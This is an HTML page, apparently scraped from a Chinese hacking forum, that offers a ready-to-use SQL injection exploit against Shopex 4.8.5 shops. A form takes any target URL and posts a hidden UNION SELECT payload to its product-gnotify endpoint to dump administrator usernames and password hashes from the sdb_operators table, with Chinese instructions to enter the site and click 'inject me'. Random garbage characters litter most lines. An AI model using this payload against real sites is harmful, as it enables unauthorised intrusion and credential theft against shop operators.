<center>6 l" Y$ X' Q6 {1 b+ Z& B7 B/ A
<title>中国网络渗透测评联盟-中测联盟|-Shopex 4.8.5 SQL Injection Exp 在线版</title>- z3 _% @' x3 n
<form action="" method="post" name="submit_url">, e6 C) O- z' s! p& K/ z; I" M- z
网址:<input type=text name=url value="http://www.political-security.com/" size=62><br><br>
5 o* N$ n$ V7 s' ~9 o+ [<input type="hidden" name="goods[goods_id]" value="3">
# y+ R6 f0 _7 @- [6 m( L$ `( C! V<input type="hidden" name="goods[product_id]" value="1 and 1=2 union select 1,2,3,4,5,6,7,8,concat(0x245E,username,0x2D3E,userpass,0x5E24),10,11,12,13,14,15,16,17,18,19,20,21,22 from sdb_operators">
f5 m" z( b4 j<input type="submit" value="给我注入" onclick=fsubmit()>9 z) k. x: O2 G5 W
</form> <br /><br />填上你要注入的网址(注意要打上http:// 要不跳转不了) 点“给我注入”就要以了。//www.political-security.com
7 P$ Z- m0 u' h- {) @9 u) O$ U
% m* K0 Z* W: D- A* ^5 c<script>
) X' Y& T6 G) V& T7 B0 Z3 Efunction fsubmit(){ M0 a) d5 Y9 u1 F9 k
form = document.forms[0];
! t! M* c! Z! g) N2 Iform.action = form.url.value+'/?product-gnotify'; 7 u( G) M* l6 R$ \ H; ^
form.submit();
2 n$ j. ]* l* p* G( L}
. t8 z( |! ~4 _& G</script>1 [/ ?0 A% p8 u+ _8 S
|